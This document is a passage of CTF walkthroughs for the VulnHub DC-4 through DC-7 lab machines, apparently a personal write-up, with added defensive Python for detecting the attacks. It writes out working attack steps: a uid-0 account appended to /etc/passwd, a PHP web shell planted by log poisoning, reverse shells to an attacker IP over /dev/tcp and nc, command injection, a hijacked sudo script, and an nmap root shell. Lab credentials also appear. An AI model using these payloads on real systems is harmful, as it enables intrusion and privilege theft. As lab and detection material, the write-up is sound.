
Credentials:

charles:^xHhA&hvim0y

Privilege escalation via teehee

Log in as charles.

/usr/bin/teehee can be run with sudo.

It is not on GTFOBins, so check the program's help:

charles@dc-4:~$ /usr/bin/teehee  --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit

MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

It can append to files, so append to /etc/passwd.

Create a hack user with uid 0:

openssl passwd -1 -salt hack password
echo 'hack:$1$hack$Qfvz92fBAtSC9ccCE6BES0:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd
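
The appended line is a second uid-0 account whose hash lives in /etc/passwd rather than /etc/shadow, and both properties are easy to check for. The following Python is an added example (my code, not from the writeup) that parses /etc/passwd content and reports those conditions plus malformed or duplicate-uid entries. The sample content is constructed around the hack line shown above; the other accounts are made up.

```python
import sys
from typing import List

# Password-field values that mean "hash is in /etc/shadow" or "account locked".
SHADOW_MARKERS = {"x", "*", "!", "!!"}
FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[dict]:
    """Split /etc/passwd content into rows; malformed lines are kept and flagged."""
    rows = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        row = {"line": lineno, "raw": line, "malformed": len(parts) != 7}
        if not row["malformed"]:
            row.update(zip(FIELDS, parts))
        rows.append(row)
    return rows


def check_passwd(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    owner_of_uid = {}
    for row in parse_passwd(text):
        where = f"line {row['line']}"
        if row["malformed"]:
            findings.append(f"{where}: malformed entry ({row['raw']!r})")
            continue
        name, pw = row["name"], row["pw"]
        if not row["uid"].isdigit():
            findings.append(f"{where}: non-numeric uid for {name}")
            continue
        uid = int(row["uid"])
        if uid == 0 and name != "root":
            findings.append(f"{where}: uid 0 account other than root: {name}")
        if pw == "":
            findings.append(f"{where}: empty password field for {name} (passwordless login)")
        elif pw not in SHADOW_MARKERS:
            findings.append(f"{where}: password hash stored in /etc/passwd for {name} (should be in /etc/shadow)")
        if uid in owner_of_uid and owner_of_uid[uid] != name:
            findings.append(f"{where}: uid {uid} shared by {owner_of_uid[uid]} and {name}")
        owner_of_uid.setdefault(uid, name)
    return findings


# Constructed sample; the last line is the one appended via teehee on DC-4.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash\n"
    "charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash\n"
    "hack:$1$hack$Qfvz92fBAtSC9ccCE6BES0:0:0:root:/root:/bin/bash\n"
)

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_PASSWD
    for finding in check_passwd(text) or ["no findings"]:
        print(finding)
```

Run with a path to check a real file (python3 passwd_check.py /etc/passwd); without arguments it reports on the constructed sample. A periodic run that diffs the findings, or a file-integrity monitor on /etc/passwd, catches this kind of append regardless of which sudo-permitted binary performed it.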

Success; the flag is in /root:

888       888          888 888      8888888b.                             888 888 888 888 
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

DC5

Vulnhub DC5

https://www.vulnhub.com/entry/dc-5,314/

Target IP

192.168.1.5

Information gathering

nmap -p- --min-rate 10000 192.168.1.7 -oN nmap/port.txt

PORT      STATE SERVICE
80/tcp open http
111/tcp open rpcbind
45665/tcp open unknown

nmap -sT -sC -sV -O -p80,111,45665 192.168.1.7 -oN nmap/detail.txt

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-title: Welcome
|_http-server-header: nginx/1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 44972/udp status
| 100024 1 45665/tcp status
| 100024 1 45705/udp6 status
|_ 100024 1 50069/tcp6 status
45665/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:99:6F:74 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop

  • OS: Linux 3.2 - 4.14
  • Open ports: 80, 111, 45665
  • nginx 1.6.2

gobuster dir -u http://192.168.1.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
dirsearch -u http://192.168.1.7 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt

(Status: 200) [Size: 4025]
images (Status: 301) [Size: 184] [--> http://192.168.1.7/images/]
contact.php (Status: 200) [Size: 4282]
faq.php (Status: 200) [Size: 5645]
solutions.php (Status: 200) [Size: 4100]
footer.php (Status: 200) [Size: 17]
css (Status: 301) [Size: 184] [--> http://192.168.1.7/css/]
about-us.php (Status: 200) [Size: 4292]
thankyou.php (Status: 200) [Size: 852]

LFI

Only a writeup revealed that there is a file inclusion:

http://192.168.1.7/contact.php

Submitting the form redirects to /thankyou.php.

Refreshing it changes the footer each time.

The directory scan found a standalone footer.php that behaves the same way, while the footer on the other pages never changes; only /thankyou.php does, so /thankyou.php evidently includes footer.php.

Fuzzing the parameter name

ffuf -u "http://192.168.1.7/thankyou.php?FUZZ=./thankyou.php" -w fuzz_params.txt

The parameter is file:

http://192.168.1.7/thankyou.php?file=/etc/passwd

This returns /etc/passwd.

Since nmap reports nginx 1.6.2, look for its log files:

/var/log/nginx/error.log

Write into the log via the User-Agent header:

curl http://192.168.1.7/ -H "User-Agent: <?php system($_POST['cmd']); phpinfo();?>"
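
The curl request above plants PHP in the User-Agent so that it lands in nginx's log; the Joomla list[fullordering] payload on DC-3 leaves UPDATEXML in the request line; the file=/etc/passwd inclusion leaves a sensitive path. All three are visible in the web server's access log, which records the User-Agent for every request (the page reads error.log through the inclusion, but detection belongs on access.log). The following Python is an added example, not from the writeup: it scans combined-format access log lines for those three indicators. The sample lines are constructed to mirror the requests made on this page and are not a real log.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# nginx/Apache "combined" log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# PHP open tags planted in any client-controlled field (log poisoning).
PHP_TAG = re.compile(r"<\?(php\b|=)?", re.IGNORECASE)
# Error-based / time-based SQL injection functions of the kind used on DC-3.
SQLI = re.compile(r"\b(updatexml|extractvalue|sleep|benchmark)\s*\(|union\s+(all\s+)?select", re.IGNORECASE)
# File inclusion / traversal targets of the kind used on DC-5 (including the log file itself).
LFI = re.compile(r"\.\./|/etc/(passwd|shadow)|/var/log/|/proc/self/environ", re.IGNORECASE)


def scan_line(line: str) -> Optional[Dict]:
    """Parse one access-log line and return {ip, time, alerts}; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode percent-encoding so UPDATEXML%28 and similar cannot slip past the patterns.
    fields = {k: unquote_plus(m[k]) for k in ("request", "referer", "ua")}
    alerts = []
    for name, value in fields.items():
        if PHP_TAG.search(value):
            alerts.append(f"php-tag in {name}")
    if SQLI.search(fields["request"]):
        alerts.append("sqli function in request")
    if LFI.search(fields["request"]):
        alerts.append("traversal or sensitive file in request")
    return {"ip": m["ip"], "time": m["time"], "alerts": alerts}


def scan(lines) -> List[Dict]:
    """Return only the parsed lines that raised at least one alert."""
    hits = []
    for line in lines:
        rec = scan_line(line)
        if rec and rec["alerts"]:
            hits.append(rec)
    return hits


# Constructed sample lines mirroring the requests made on this page (not a real log).
SAMPLE_LOG = """\
192.168.1.17 - - [21/Feb/2026:18:11:42 +0800] "GET / HTTP/1.1" 200 4025 "-" "<?php system($_POST['cmd']); phpinfo();?>"
192.168.1.17 - - [21/Feb/2026:18:04:48 +0800] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 1502 "-" "Mozilla/5.0"
192.168.1.17 - - [18/Feb/2026:07:21:57 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(6745,CONCAT(0x2e,0x717a787071,(SELECT%20(ELT(6745=6745,1))),0x716b706271),6543)) HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.168.1.5 - - [21/Feb/2026:18:00:00 +0800] "GET /faq.php HTTP/1.1" 200 5645 "http://192.168.1.7/" "Mozilla/5.0 (X11; Linux x86_64)"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["ip"], ", ".join(hit["alerts"]))
```

Fed a real file (for example scan(open("/var/log/nginx/access.log"))) it prints the poisoning attempt, the inclusion attempt and the injection probe, and nothing for ordinary traffic. The matching mitigation on the server side is to keep the web log directory unreadable by the PHP worker, so a poisoned line can never be included even if the file= parameter stays unfixed.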

Connect with AntSword.

Reverse shell

/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.17/6666 0>&1'

Privilege escalation via SUID screen

Search for SUID files:

find / -perm -4000 2>/dev/null

/bin/screen-4.5.0 is present:

searchsploit screen 4.5.0

There is an exploit script; download it and upload it to the target.

Run it.

The flag is in /root:

888b    888 d8b                                                      888      888 888 888 
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888




Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

DC6

vulnhub dc6

https://www.vulnhub.com/entry/dc-6,315/

Target IP

192.168.1.12

Add to hosts:

192.168.1.12 wordy

Information gathering

nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt

PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

nmap -sT -sC -sV -O -p22,80 192.168.1.12 -oN nmap/detail.txt

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Wordy &#8211; Just another WordPress site
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:AA:DF:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • 操作系统:Linux 3.2 - 4.14(Debian)
  • Web服务器:Apache 2.4.25 (Debian)
  • CMS系统:WordPress 5.1.1
```
dirsearch -u http://192.168.1.12 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt
```

```
gobuster dir -u http://192.168.1.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
```

```
/index.php
/wp-admin
/wp-content
/wp-includes
/xmlrpc.php
/wp-login.php
/license.txt
/readme.html
/wp-trackback.php
/wp-signup.php
/server-status
```

wpscan

The CMS is WordPress 5.1.1, so enumerate it with wpscan.

Users

```
wpscan --url http://wordy --enumerate u
```

```
admin
sarah
graham
mark
jens
```

Brute force

```
wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt
```

Running the full rockyou list against five users takes a long time; the VulnHub description for DC-6 gives the clue that the password contains "k01" (cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt), which cuts the list to a few thousand entries.

Credentials obtained:

```
mark:helpdesk01
```

RCE from the admin panel

Log in with the credentials:

```
http://wordy/wp-login.php?registration=disabled
```

Activity Monitor -> Tools -> Lookup takes an IP address from the user and passes it to a shell command, so the ip field allows command injection.

image-20260222204900784

```
------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="ip"

127.0.0.1 || whoami
------WebKitFormBoundaryBvV7QrEP9iMYIXcG
Content-Disposition: form-data; name="lookup"
```

image-20260222205328831
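The lookup above fails on the fake address, and the `||` then hands the rest of the line to the shell. The following is an added Python model of that mistake and of its fix; it is not the plugin's code (which is PHP). The weak version concatenates the ip field into a shell command string; the hardened version validates the field as a single IP literal and passes it as its own argv element with no shell, so metacharacters never reach /bin/sh. The base command is parameterised so the demonstration can run with `echo`/`false` instead of a real lookup tool.

```python
"""Command injection in an IP lookup: vulnerable vs hardened (added example)."""
import ipaddress
import subprocess
from typing import List

# Assumed shape of the plugin's lookup; the real command line is not shown in the write-up
DEFAULT_BASE = ["dig", "+short", "-x"]


def lookup_vulnerable(ip: str, base: List[str] = DEFAULT_BASE) -> str:
    """Unsafe: user input is glued into a string and run through /bin/sh."""
    cmd = " ".join(base) + " " + ip            # <- injection point: "127.0.0.1 || whoami"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_ip(ip: str) -> str:
    """Accept exactly one IPv4/IPv6 literal; anything else (spaces, |, ;, hostnames) raises ValueError."""
    return str(ipaddress.ip_address(ip.strip()))


def build_lookup_argv(ip: str, base: List[str] = DEFAULT_BASE) -> List[str]:
    """Hardened command line: validated value as a separate argv element, no shell involved."""
    return list(base) + [validate_ip(ip)]


def lookup_hardened(ip: str, base: List[str] = DEFAULT_BASE) -> str:
    """Safe: argv list with shell=False, so the kernel execs the tool directly."""
    return subprocess.run(build_lookup_argv(ip, base), shell=False,
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "127.0.0.1 || echo INJECTED"
    # base=["false"] mimics a lookup that fails on the bogus address, as on DC-6
    print("vulnerable:", lookup_vulnerable(payload, base=["false"]).strip())
    try:
        lookup_hardened(payload, base=["false"])
    except ValueError as e:
        print("hardened rejected input:", e)
```

Validation alone is not the fix: the structural change is `shell=False` with an argument list, which holds even if a later edit adds a field the validator forgot.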

Reverse shell through the same field:

```
127.0.0.1 || nc -c /bin/bash 192.168.1.17 6666
```

image-20260222210224783

/home/mark/stuff/things-to-do.txt contains:

```
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
```

Another set of credentials:

```
graham:GSo7isUM1D4
```

Log in over SSH as graham.

image-20260222210641887

Lateral movement through backups.sh

/home/jens holds a backup script, backups.sh, and graham's sudo rights are:

```
(jens) NOPASSWD: /home/jens/backups.sh
```

So graham can run /home/jens/backups.sh as jens without a password. The script itself is writable by graham, so replace its contents with a reverse shell:

```
echo '#!/bin/bash' > backups.sh
echo 'bash -i >& /dev/tcp/192.168.1.17/7777 0>&1' >> backups.sh
```

```
sudo -u jens /home/jens/backups.sh
```

This gives a shell as jens.

image-20260222211919353

Privilege escalation via nmap

sudo -l for jens shows /usr/bin/nmap may be run as root.

nmap's --script option loads any Lua file by path, so a one-line NSE script that spawns a shell runs as root:

```
echo 'os.execute("/bin/bash")' > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
```

image-20260222212747618

```
Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)


Congratulations!!!

Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
```

DC7

vulnhub dc7

https://www.vulnhub.com/entry/dc-7,356/

Target IP

```
192.168.1.11
```

Information gathering

```
nmap -p- --min-rate 10000 192.168.1.11 -oN nmap/port.txt
```

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
```
nmap -sT -sC -sV -O -p22,80 192.168.1.11 -oN nmap/detail.txt
```

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 08:00:27:1A:79:48 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

  • OS: Linux 3.2 - 4.14 (Debian)
  • Open ports: 22, 80
  • Web server: Apache 2.4.25
  • CMS: Drupal 8
  • robots.txt: 22 disallowed entries, exposing the usual Drupal paths
```
gobuster dir -u http://192.168.1.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
```

```
dirsearch -u http://192.168.1.11 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt
```

```
301 - /core -> http://192.168.1.11/core/
301 - /modules -> http://192.168.1.11/modules/
200 - /index.php
301 - /profiles -> http://192.168.1.11/profiles/
200 - /robots.txt
302 - /search -> http://192.168.1.11/search/node
302 - /Search -> http://192.168.1.11/search/node
301 - /sites -> http://192.168.1.11/sites/
301 - /themes -> http://192.168.1.11/themes/
302 - /user -> http://192.168.1.11/user/login
200 - /web.config
```

Browsing each of these turned up nothing useful.

GitHub leak

http://192.168.1.11/user/password

Enumerating the password-reset form confirms that the user admin exists.

The author states, however, that brute force will not find the password, so the way in must lie elsewhere.

Drupal 8 suggests CVE-2018-7600 and CVE-2018-7602 (the Drupalgeddon 2 family); both attempts failed.

Following the hint, stop looking at the web application itself.

The VulnHub description for DC-7 reads:

```
DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box. :-)
```

image-20260223194607652

A Google search for the handle shown on the site leads to:

https://github.com/Dc7User/staffdb

It is a public repository containing the site's source, and config.php holds a set of credentials:

```
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
```

```
dc7user:MdR3xOgB7#dW
```

The pair does not work on the CMS login, but it is accepted by SSH: a database password reused for a system account.

Scheduled task

dc7user's home directory contains a mail spool:

From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EeF-0000Dx-G1
for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Esl-0000Ec-JQ
for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3F7H-0000G3-Nb
for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Hvd-0000ED-CP
for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Jng-0000Iw-Rq
for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3K28-0000Ll-11
for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3LCo-0000Eb-02
for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
